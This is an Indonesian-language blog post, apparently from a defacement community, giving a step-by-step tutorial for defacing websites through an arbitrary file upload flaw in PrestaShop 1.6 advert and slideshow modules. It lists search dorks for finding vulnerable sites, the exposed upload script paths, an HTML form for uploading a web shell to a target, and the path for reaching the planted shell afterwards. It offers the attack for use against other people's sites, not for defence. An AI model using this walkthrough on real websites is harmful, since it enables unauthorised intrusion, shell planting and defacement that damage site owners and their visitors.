Hai,,, Para Defacer :D
Gua gak bakal bosen kasih tutorial defacenya :D wkwkwk. Kali ini tentang Deface Dengan Responsive Prestashop 1.6 Arbitrary File Upload. Nama nya aja panjang banget :v wwkwkwkk.
Oke kita langsung mulai aja tutorialnya
Sama Seperti biasa :D
Dork : - inurl:/modules/columnadverts/
- inurl:/modules/homepageadvertise/
- inurl:/modules/productpageadverts/
- inurl:/modules/simpleslideshow/
- inurl:/themes/warehouse/
( Use Your Brain :* )
Lakukan Dorking :D sama seperti biasanya. Apabila web vuln, maka akan seperti gambar dibawah :).
Exploit : - /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
Untuk CSRF nya :
<form action="TARGET/modules/module name/uploadimage.php" enctype="multipart/form-data" method="POST">
<input name="userfile" type="file" /><button>Upload</button>
</form>
<input name="userfile" type="file" /><button>Upload</button>
</form>
apabila muncul "success:nama.php" itu berarti shell berhasil dipload. untuk akses shellnya,
site.com/modules/nama modulnya/slides/namashell.php
Sekian Post tentang Deface Dengan Responsive Prestashop 1.6 Arbitrary File Upload
Terima Kasih.
![No Name Shell [ Xai Syndicate ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs9r7nplH_ADl-IThaJSGq_FmLTFQRS5T5HX-k4ss8Xbr2DovndBD2ddq-Y2o99rCalOWoZ2GuIu8qogwq0cEqXfJ2QGC05Ku6PGbuC6avo-8WrolGHzd9FDngkiA5gaAQYlcajinDGYc/s72-c/Screenshot+from+2017-03-26+21-16-55.png "No Name Shell [ Xai Syndicate ]")
EmoticonEmoticon